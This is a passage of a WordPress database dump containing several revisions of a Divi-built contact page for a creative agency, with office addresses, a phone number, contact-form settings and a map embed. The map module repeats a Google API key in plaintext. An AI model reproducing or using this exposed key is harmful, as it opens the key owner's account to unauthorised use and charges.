href=\"mailto:singapore@wthtest1.in8.cdn-alpha.com\">singapore@wthtest1.in8.cdn-alpha.com</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" fullwidth=\"on\" admin_label=\"Map Section\" _builder_version=\"3.22\"][et_pb_fullwidth_map address=\"B-53/2, Naraina Vihar, New Delhi-110028, India\" _builder_version=\"4.5.5\" _module_preset=\"default\" hover_enabled=\"0\" google_api_key=\"AIzaSyAdnWMyhH9MNLMG_ej6wNpMPsbnpXzDomw\" zoom_level=\"22\"][et_pb_map_pin title=\"WhatTheHell?\" pin_address=\"B-53/2, Naraina Vihar, New Delhi-110028, India\" _builder_version=\"4.5.2\" _module_preset=\"default\"]<p>B-53/2, Naraina Vihar, New Delhi - 110028, India</p>[/et_pb_map_pin][et_pb_map_pin _builder_version=\"4.5.5\" _module_preset=\"default\" pin_address=\"B-53/2, Naraina Vihar, New Delhi - 110028, India\" hover_enabled=\"0\"][/et_pb_map_pin][/et_pb_fullwidth_map][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_direction=\"bottom\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Get in touch.</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" global_module=\"630\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','CONTACT','','inherit','closed','closed','','401-revision-v1','','','2020-08-10 09:49:59','2020-08-10 09:49:59','',401,'https://wthtest1.in8.cdn-alpha.com/401-revision-v1/',0,'revision','',0),(742,1,'2020-08-10 10:05:04','2020-08-10 10:05:04','[et_pb_section fb_built=\"1\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>COntact US</h1>[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Section\" _builder_version=\"3.22\" custom_padding=\"50px||50px|||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" admin_label=\"Contact Area\" _builder_version=\"3.25\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\"]<h4>Delhi</h4>\n<p>B-53/2, Naraina Vihar, New Delhi - 110028, India</p>\n<p>+91 9315666436</p>\n<p><a href=\"mailto:dhiraj@wthtest1.in8.cdn-alpha.com\">dhiraj@wthtest1.in8.cdn-alpha.com</a></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" locked=\"off\"]<h4>Bangalore</h4>\n<p>&nbsp;</p>\n<p><a href=\"mailto:bangalore@wthtest1.in8.cdn-alpha.com\">bangalore@wthtest1.in8.cdn-alpha.com</a></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" locked=\"off\"]<h4>Singapore</h4>\n<p>&nbsp;</p>\n<p><a href=\"mailto:singapore@wthtest1.in8.cdn-alpha.com\">singapore@wthtest1.in8.cdn-alpha.com</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" fullwidth=\"on\" admin_label=\"Map Section\" _builder_version=\"3.22\"][et_pb_fullwidth_map google_api_key=\"AIzaSyAdnWMyhH9MNLMG_ej6wNpMPsbnpXzDomw\" address=\"B-53/2, Naraina Vihar, New Delhi-110028, India\" zoom_level=\"22\" _builder_version=\"4.5.5\" _module_preset=\"default\" hover_enabled=\"0\"][et_pb_map_pin title=\"WhatTheHell?\" pin_address=\"B-53/2, Naraina Vihar, New Delhi-110028, India\" _builder_version=\"4.5.5\" _module_preset=\"default\" hover_enabled=\"0\"]<p>B-53/2, Naraina Vihar, New Delhi - 110028, India</p>[/et_pb_map_pin][/et_pb_fullwidth_map][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_direction=\"bottom\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Get in touch.</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" global_module=\"630\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','CONTACT','','inherit','closed','closed','','401-revision-v1','','','2020-08-10 10:05:04','2020-08-10 10:05:04','',401,'https://wthtest1.in8.cdn-alpha.com/401-revision-v1/',0,'revision','',0),(745,1,'2020-08-10 10:30:04','2020-08-10 10:30:04','[et_pb_section fb_built=\"1\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>COntact US</h1>[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Section\" _builder_version=\"3.22\" custom_padding=\"50px||50px|||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" admin_label=\"Contact Area\" _builder_version=\"3.25\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\"]<h4>Delhi</h4>\n<p>B-53/2, Naraina Vihar, New Delhi - 110028, India</p>\n<p>+91 9315666436</p>\n<p><a href=\"mailto:dhiraj@wthtest1.in8.cdn-alpha.com\">dhiraj@wthtest1.in8.cdn-alpha.com</a></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" locked=\"off\"]<h4>Bangalore</h4>\n<p>&nbsp;</p>\n<p><a href=\"mailto:bangalore@wthtest1.in8.cdn-alpha.com\">bangalore@wthtest1.in8.cdn-alpha.com</a></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" locked=\"off\"]<h4>Singapore</h4>\n<p>&nbsp;</p>\n<p><a href=\"mailto:singapore@wthtest1.in8.cdn-alpha.com\">singapore@wthtest1.in8.cdn-alpha.com</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" fullwidth=\"on\" admin_label=\"Map Section\" _builder_version=\"3.22\"][et_pb_fullwidth_code _builder_version=\"4.5.5\" _module_preset=\"default\" hover_enabled=\"0\"]<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d14008.529292925106!2d77.138047!3d28.625796!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xff75c41354d8317!2sWhatTheHell%3F%20-%20Creative%20Agency%20-%20Digital%20Agency!5e0!3m2!1sen!2sin!4v1597054958439!5m2!1sen!2sin\" width=\"100%\" height=\"450\" frameborder=\"0\" style=\"border:0;\" allowfullscreen=\"\" aria-hidden=\"false\" tabindex=\"0\"></iframe>[/et_pb_fullwidth_code][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_direction=\"bottom\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Get in touch.</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" global_module=\"630\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','CONTACT','','inherit','closed','closed','','401-revision-v1','','','2020-08-10 10:30:04','2020-08-10 10:30:04','',401,'https://wthtest1.in8.cdn-alpha.com/401-revision-v1/',0,'revision','',0),(749,1,'2020-08-18 10:49:35','0000-00-00 00:00:00','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" 